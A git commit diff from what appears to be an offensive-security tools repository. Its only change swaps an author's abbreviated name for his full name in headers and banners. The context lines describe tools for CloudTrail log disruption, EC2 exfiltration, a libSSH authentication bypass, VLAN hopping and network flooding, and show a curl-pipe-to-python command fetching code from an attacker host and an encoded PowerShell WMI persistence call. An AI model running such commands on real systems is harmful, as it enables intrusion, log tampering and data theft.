updates
This commit is contained in:
parent
2e115fe796
commit
558762a498
@ -36,6 +36,6 @@ This and other projects are outcome of sleepless nights and **plenty of hard wor
|
|||||||
---
|
---
|
||||||
|
|
||||||
```
|
```
|
||||||
Mariusz B. / mgeeky, (@mariuszbit)
|
Mariusz Banach / mgeeky, (@mariuszbit)
|
||||||
<mb [at] binary-offensive.com>
|
<mb [at] binary-offensive.com>
|
||||||
```
|
```
|
@ -33,7 +33,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --help
|
|||||||
|
|
||||||
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
||||||
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name]
|
usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name]
|
||||||
|
|
||||||
@ -64,7 +64,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --access-key ASIAXXXXXXXXXXXXXXXX
|
|||||||
|
|
||||||
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
||||||
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] Will be working on Account ID: 712800000000
|
[.] Will be working on Account ID: 712800000000
|
||||||
[.] Step 1: Determine trail to disrupt
|
[.] Step 1: Determine trail to disrupt
|
||||||
@ -181,7 +181,7 @@ attacker $ python3 ./exfiltrate-ec2.py --help
|
|||||||
|
|
||||||
:: exfiltrate-ec2
|
:: exfiltrate-ec2
|
||||||
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
|
usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
|
||||||
[--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
|
[--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
|
||||||
@ -236,7 +236,7 @@ attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default -
|
|||||||
|
|
||||||
:: exfiltrate-ec2
|
:: exfiltrate-ec2
|
||||||
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] Using attacker's profile: default
|
[.] Using attacker's profile: default
|
||||||
[.] Using victim's profile: victim-profile
|
[.] Using victim's profile: victim-profile
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
# This script simply calls `aws sts assume-role` using hardcoded parameters, in order
|
# This script simply calls `aws sts assume-role` using hardcoded parameters, in order
|
||||||
# to retrieve set of session credentials and reformat it into ~/.aws/credentials file format.
|
# to retrieve set of session credentials and reformat it into ~/.aws/credentials file format.
|
||||||
#
|
#
|
||||||
# Mariusz B., mgeeky '19-20
|
# Mariusz Banach, mgeeky '19-20
|
||||||
#
|
#
|
||||||
|
|
||||||
|
|
||||||
|
@ -38,7 +38,7 @@
|
|||||||
# - boto3
|
# - boto3
|
||||||
# - pytest
|
# - pytest
|
||||||
#
|
#
|
||||||
# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
# Author: Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
|
|
||||||
@ -427,7 +427,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
||||||
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
# policy statements. Then goes through allowed permissions to pick all of them out.
|
# policy statements. Then goes through allowed permissions to pick all of them out.
|
||||||
# Finally, checks every allowed permission against a list of known troublesome ones.
|
# Finally, checks every allowed permission against a list of known troublesome ones.
|
||||||
#
|
#
|
||||||
# Mariusz B., mgeeky '19, <mb@binary-offensive.com>
|
# Mariusz Banach, mgeeky '19, <mb@binary-offensive.com>
|
||||||
# v0.1
|
# v0.1
|
||||||
#
|
#
|
||||||
|
|
||||||
|
@ -33,7 +33,7 @@
|
|||||||
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
|
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
|
||||||
# not recommended to use it during legal AWS Penetration Tests
|
# not recommended to use it during legal AWS Penetration Tests
|
||||||
#
|
#
|
||||||
# Author: Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
|
# Author: Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@ -422,7 +422,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: exfiltrate-ec2
|
:: exfiltrate-ec2
|
||||||
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(prog = argv[0])
|
parser = argparse.ArgumentParser(prog = argv[0])
|
||||||
|
@ -9,7 +9,7 @@
|
|||||||
#
|
#
|
||||||
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
|
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
|
||||||
#
|
#
|
||||||
# Author: Mariusz B., '19, <mb@binary-offensive.com>
|
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import zipfile, StringIO
|
import zipfile, StringIO
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
# This script leverages couple of methods in order to validate that passed
|
# This script leverages couple of methods in order to validate that passed
|
||||||
# domain is a S3 bucket indeed.
|
# domain is a S3 bucket indeed.
|
||||||
#
|
#
|
||||||
# Mariusz B., 2019, <mb@binary-offensive.com>
|
# Mariusz Banach, 2019, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
require 'resolv'
|
require 'resolv'
|
||||||
@ -245,7 +245,7 @@ def main(args)
|
|||||||
|
|
||||||
puts %{
|
puts %{
|
||||||
:: Identifies AWS S3 Buckets via couple of methods
|
:: Identifies AWS S3 Buckets via couple of methods
|
||||||
Mariusz B. 19', <mb@binary-offensive.com>
|
Mariusz Banach 19', <mb@binary-offensive.com>
|
||||||
}
|
}
|
||||||
|
|
||||||
if ARGV.length != 1
|
if ARGV.length != 1
|
||||||
|
@ -20,7 +20,7 @@
|
|||||||
# Requirements:
|
# Requirements:
|
||||||
# - gem "aws-sdk-ec2"
|
# - gem "aws-sdk-ec2"
|
||||||
#
|
#
|
||||||
# Author: Mariusz B., '19, <mb@binary-offensive.com>
|
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
require 'aws-sdk-ec2'
|
require 'aws-sdk-ec2'
|
||||||
|
@ -8,7 +8,7 @@ c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
|
|||||||
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
||||||
making them much harder to be decompressed & restored.
|
making them much harder to be decompressed & restored.
|
||||||
|
|
||||||
Mariusz B. / mgeeky, '21
|
Mariusz Banach / mgeeky, '21
|
||||||
|
|
||||||
Step 1. Renaming UPX sections...
|
Step 1. Renaming UPX sections...
|
||||||
Renamed UPX section (UPX0 ) => (.text)
|
Renamed UPX section (UPX0 ) => (.text)
|
||||||
|
@ -119,7 +119,7 @@ def main(argv):
|
|||||||
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
||||||
making them much harder to be decompressed & restored.
|
making them much harder to be decompressed & restored.
|
||||||
|
|
||||||
Mariusz B. / mgeeky, '21
|
Mariusz Banach / mgeeky, '21
|
||||||
''')
|
''')
|
||||||
|
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
#
|
#
|
||||||
# OpenVAS automation script.
|
# OpenVAS automation script.
|
||||||
# Mariusz B. / mgeeky, '17
|
# Mariusz Banach / mgeeky, '17
|
||||||
# v0.2
|
# v0.2
|
||||||
#
|
#
|
||||||
|
|
||||||
|
@ -13,7 +13,7 @@
|
|||||||
# keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script
|
# keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script
|
||||||
# - only tools that I've found useful at least once are landing in this script.
|
# - only tools that I've found useful at least once are landing in this script.
|
||||||
#
|
#
|
||||||
# Mariusz B., '18-'19
|
# Mariusz Banach, '18-'19
|
||||||
#
|
#
|
||||||
|
|
||||||
# Well, entire Kali installation assume that we are normally working as root on our Kali.
|
# Well, entire Kali installation assume that we are normally working as root on our Kali.
|
||||||
|
@ -8,7 +8,7 @@
|
|||||||
# Python requirements:
|
# Python requirements:
|
||||||
# - scapy
|
# - scapy
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@ -202,7 +202,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: CDP Flooding / Denial of Service tool
|
:: CDP Flooding / Denial of Service tool
|
||||||
Floods the interface with fake, randomly generated CDP packets.
|
Floods the interface with fake, randomly generated CDP packets.
|
||||||
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -6,7 +6,7 @@
|
|||||||
# Python requirements:
|
# Python requirements:
|
||||||
# - scapy
|
# - scapy
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@ -122,7 +122,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: HSRP Flooding / Denial of Service tool
|
:: HSRP Flooding / Denial of Service tool
|
||||||
Floods the interface with Active router Coup HSRP packets.
|
Floods the interface with Active router Coup HSRP packets.
|
||||||
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -33,7 +33,7 @@ PS D:\> python3 .\exchangeRecon.py 10.10.10.9
|
|||||||
|
|
||||||
:: Exchange Fingerprinter
|
:: Exchange Fingerprinter
|
||||||
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
|
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
v0.2
|
v0.2
|
||||||
|
|
||||||
[.] Probing for Exchange fingerprints...
|
[.] Probing for Exchange fingerprints...
|
||||||
@ -141,7 +141,7 @@ bash $ python RoutingAttackKit.py
|
|||||||
|
|
||||||
:: Routing Protocols Exploitation toolkit
|
:: Routing Protocols Exploitation toolkit
|
||||||
Sends out various routing protocols management frames
|
Sends out various routing protocols management frames
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
v0.1
|
v0.1
|
||||||
|
|
||||||
Available attacks:
|
Available attacks:
|
||||||
@ -157,7 +157,7 @@ bash # python RoutingAttackKit.py -t rip-fuzzer -v
|
|||||||
|
|
||||||
:: Routing Protocols Exploitation toolkit
|
:: Routing Protocols Exploitation toolkit
|
||||||
Sends out various routing protocols management frames
|
Sends out various routing protocols management frames
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
v0.1
|
v0.1
|
||||||
|
|
||||||
[.] Using 192.168.1.14 as local/spoof IP address
|
[.] Using 192.168.1.14 as local/spoof IP address
|
||||||
@ -241,7 +241,7 @@ $ ./VLANHopperDTP.py --help
|
|||||||
|
|
||||||
:: VLAN Hopping via DTP Trunk negotiation
|
:: VLAN Hopping via DTP Trunk negotiation
|
||||||
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
||||||
Mariusz B. / mgeeky, '18
|
Mariusz Banach / mgeeky, '18
|
||||||
v0.3
|
v0.3
|
||||||
|
|
||||||
usage: ./VLANHopperDTP.py [options]
|
usage: ./VLANHopperDTP.py [options]
|
||||||
@ -279,7 +279,7 @@ $ sudo ./VLANHopperDTP.py -i enp5s0f1
|
|||||||
|
|
||||||
:: VLAN Hopping via DTP Trunk negotiation
|
:: VLAN Hopping via DTP Trunk negotiation
|
||||||
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
||||||
Mariusz B. / mgeeky, '18
|
Mariusz Banach / mgeeky, '18
|
||||||
v0.2
|
v0.2
|
||||||
|
|
||||||
[+] VLAN Hopping IS possible.
|
[+] VLAN Hopping IS possible.
|
||||||
|
@ -13,7 +13,7 @@
|
|||||||
# Python requirements:
|
# Python requirements:
|
||||||
# - scapy
|
# - scapy
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@ -618,7 +618,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: Routing Protocols Exploitation toolkit
|
:: Routing Protocols Exploitation toolkit
|
||||||
Sends out various routing protocols management frames
|
Sends out various routing protocols management frames
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -39,7 +39,7 @@
|
|||||||
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
|
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
|
||||||
# - Add functionality to auto-scan via arp-scan desired network
|
# - Add functionality to auto-scan via arp-scan desired network
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '18-19, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, '18-19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@ -724,7 +724,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: VLAN Hopping via DTP Trunk negotiation
|
:: VLAN Hopping via DTP Trunk negotiation
|
||||||
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
||||||
Mariusz B. / mgeeky '18-19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '18-19, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
# the switch's port. This reconessaince will be helpful for performing
|
# the switch's port. This reconessaince will be helpful for performing
|
||||||
# VLAN Hopping attacks.
|
# VLAN Hopping attacks.
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '18
|
# Mariusz Banach / mgeeky, '18
|
||||||
#
|
#
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
@ -32,7 +32,7 @@
|
|||||||
# - packaging
|
# - packaging
|
||||||
#
|
#
|
||||||
# Author:
|
# Author:
|
||||||
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@ -1300,7 +1300,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: Exchange Fingerprinter
|
:: Exchange Fingerprinter
|
||||||
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
|
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -6,7 +6,7 @@
|
|||||||
#
|
#
|
||||||
# Based on "Black Hat Python" book by Justin Seitz.
|
# Based on "Black Hat Python" book by Justin Seitz.
|
||||||
#
|
#
|
||||||
# Mariusz B.
|
# Mariusz Banach
|
||||||
#
|
#
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
@ -51,7 +51,7 @@ if __name__ == '__main__':
|
|||||||
|
|
||||||
print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit'
|
print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit'
|
||||||
print '\t(based on Metasploit HDM\'s <iis_webdav_upload_asp> implementation)'
|
print '\t(based on Metasploit HDM\'s <iis_webdav_upload_asp> implementation)'
|
||||||
print '\tMariusz B. / mgeeky, 2016\n'
|
print '\tMariusz Banach / mgeeky, 2016\n'
|
||||||
|
|
||||||
host = sys.argv[1]
|
host = sys.argv[1]
|
||||||
if not host.startswith('http'):
|
if not host.startswith('http'):
|
||||||
|
@ -25,7 +25,7 @@
|
|||||||
# Requirements:
|
# Requirements:
|
||||||
# - paramiko
|
# - paramiko
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@ -360,7 +360,7 @@ def main():
|
|||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: CVE-2018-10993 libSSH authentication bypass exploit.
|
:: CVE-2018-10993 libSSH authentication bypass exploit.
|
||||||
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
|
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
|
||||||
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
|
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
# configuration files in order to extract plain and cipher passwords out of them.
|
# configuration files in order to extract plain and cipher passwords out of them.
|
||||||
# Equipped with functionality to decrypt Cisco Type 7 passwords.
|
# Equipped with functionality to decrypt Cisco Type 7 passwords.
|
||||||
#
|
#
|
||||||
# Mariusz B., mgeeky '18-20
|
# Mariusz Banach, mgeeky '18-20
|
||||||
#
|
#
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@ -427,7 +427,7 @@ def printResults():
|
|||||||
def main(argv):
|
def main(argv):
|
||||||
Logger._out('''
|
Logger._out('''
|
||||||
:: Network-configuration Credentials extraction script
|
:: Network-configuration Credentials extraction script
|
||||||
Mariusz B. / mgeeky, '18
|
Mariusz Banach / mgeeky, '18
|
||||||
''')
|
''')
|
||||||
opts = parseOptions(argv)
|
opts = parseOptions(argv)
|
||||||
if not opts:
|
if not opts:
|
||||||
|
@ -72,7 +72,7 @@
|
|||||||
# - Microsoft Exchange Server 2013
|
# - Microsoft Exchange Server 2013
|
||||||
#
|
#
|
||||||
# Author:
|
# Author:
|
||||||
# Mariusz B. / mgeeky, '17-19,
|
# Mariusz Banach / mgeeky, '17-19,
|
||||||
# <mb@binary-offensive.com>
|
# <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
@ -2958,7 +2958,7 @@ Date: {dateNow}
|
|||||||
|
|
||||||
smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool,
|
smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool,
|
||||||
(https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa)
|
(https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa)
|
||||||
by Mariusz B. / mgeeky (<mb@binary-offensive.com>)
|
by Mariusz Banach / mgeeky (<mb@binary-offensive.com>)
|
||||||
.
|
.
|
||||||
'''
|
'''
|
||||||
|
|
||||||
@ -3698,7 +3698,7 @@ class ParseOptions:
|
|||||||
def banner():
|
def banner():
|
||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: SMTP Black-Box Audit tool.
|
:: SMTP Black-Box Audit tool.
|
||||||
v{}, Mariusz B. / mgeeky, '17
|
v{}, Mariusz Banach / mgeeky, '17
|
||||||
|
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
@ -3828,7 +3828,7 @@ def main(argv):
|
|||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: SMTP configuration Audit / Penetration-testing tool
|
:: SMTP configuration Audit / Penetration-testing tool
|
||||||
Intended to be used as a black-box tool revealing security state of SMTP.
|
Intended to be used as a black-box tool revealing security state of SMTP.
|
||||||
Mariusz B. / mgeeky, '17-19
|
Mariusz Banach / mgeeky, '17-19
|
||||||
v{}
|
v{}
|
||||||
|
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
# Simple script intended to abuse SMTP server's VRFY command to leak
|
# Simple script intended to abuse SMTP server's VRFY command to leak
|
||||||
# usernames having accounts registered within it.
|
# usernames having accounts registered within it.
|
||||||
#
|
#
|
||||||
# Mariusz B., 2016
|
# Mariusz Banach, 2016
|
||||||
#
|
#
|
||||||
|
|
||||||
import socket
|
import socket
|
||||||
|
@ -7,7 +7,7 @@
|
|||||||
# Nothing fancy, just set of needed commands. Especially handy when
|
# Nothing fancy, just set of needed commands. Especially handy when
|
||||||
# used with `startEAPHammer.sh` script.
|
# used with `startEAPHammer.sh` script.
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
if [ $# -ne 2 ]; then
|
if [ $# -ne 2 ]; then
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
# that takes as input list of APs against which should deauth be launched,
|
# that takes as input list of APs against which should deauth be launched,
|
||||||
# and then attempts that attack.
|
# and then attempts that attack.
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
if [ $# -ne 1 ]; then
|
if [ $# -ne 1 ]; then
|
||||||
|
@ -14,7 +14,7 @@
|
|||||||
# Especially handy when used with companion script called:
|
# Especially handy when used with companion script called:
|
||||||
# `initDHCPServer.sh`
|
# `initDHCPServer.sh`
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
####################################################################
|
####################################################################
|
||||||
|
@ -5,7 +5,7 @@ Create Contoso Users in Active Directory This script creates 270 + users in Acti
|
|||||||
|
|
||||||
***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes***
|
***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes***
|
||||||
|
|
||||||
***Modified by: Mariusz B., mb@binary-offensive.com - @mgeeky***
|
***Modified by: Mariusz Banach, mb@binary-offensive.com - @mgeeky***
|
||||||
|
|
||||||
**To Use:**
|
**To Use:**
|
||||||
Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt.
|
Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt.
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
# with incoming OBEX Object Push requests containing
|
# with incoming OBEX Object Push requests containing
|
||||||
# specified file.
|
# specified file.
|
||||||
#
|
#
|
||||||
# Mariusz B. / MGeeky, 16'
|
# Mariusz Banach / MGeeky, 16'
|
||||||
#
|
#
|
||||||
# Partially based on `Violent Python` snippets.
|
# Partially based on `Violent Python` snippets.
|
||||||
# Modules required:
|
# Modules required:
|
||||||
@ -79,7 +79,7 @@ def main():
|
|||||||
parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly')
|
parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly')
|
||||||
|
|
||||||
print '\nBluetooth file carpet bombing via OBEX Object Push'
|
print '\nBluetooth file carpet bombing via OBEX Object Push'
|
||||||
print 'Mariusz B. / MGeeky 16\n'
|
print 'Mariusz Banach / MGeeky 16\n'
|
||||||
|
|
||||||
(opts, args) = parser.parse_args()
|
(opts, args) = parser.parse_args()
|
||||||
|
|
||||||
|
@ -14,7 +14,7 @@
|
|||||||
# WILL RETURN:
|
# WILL RETURN:
|
||||||
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123
|
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky
|
# Mariusz Banach / mgeeky
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys, os
|
import sys, os
|
||||||
|
@ -4,7 +4,7 @@
|
|||||||
# In latter case producing encrypted ZIP package that will get decompressed automatically
|
# In latter case producing encrypted ZIP package that will get decompressed automatically
|
||||||
# after decryption.
|
# after decryption.
|
||||||
#
|
#
|
||||||
# Mariusz B., 2016 v0.1
|
# Mariusz Banach, 2016 v0.1
|
||||||
#
|
#
|
||||||
|
|
||||||
require 'optparse'
|
require 'optparse'
|
||||||
|
@ -11,7 +11,7 @@
|
|||||||
# - scanning for other VMs
|
# - scanning for other VMs
|
||||||
# - setting selected VM's IP address within /etc/hosts (and alike) file
|
# - setting selected VM's IP address within /etc/hosts (and alike) file
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '16-'19
|
# Mariusz Banach / mgeeky, '16-'19
|
||||||
# v0.7
|
# v0.7
|
||||||
#
|
#
|
||||||
|
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
# Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length
|
# Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length
|
||||||
# it searches for proper key that could decrypt cipher into text.
|
# it searches for proper key that could decrypt cipher into text.
|
||||||
#
|
#
|
||||||
# Mariusz B., 2016
|
# Mariusz Banach, 2016
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
|
@ -15,7 +15,7 @@
|
|||||||
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
|
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
|
||||||
'
|
'
|
||||||
' AUTHOR:
|
' AUTHOR:
|
||||||
' Mariusz B. / mgeeky, '17
|
' Mariusz Banach / mgeeky, '17
|
||||||
'
|
'
|
||||||
|
|
||||||
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
|
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
|
||||||
|
@ -45,7 +45,7 @@
|
|||||||
# - packaging
|
# - packaging
|
||||||
# - dnspython
|
# - dnspython
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '21
|
# Mariusz Banach / mgeeky, '21
|
||||||
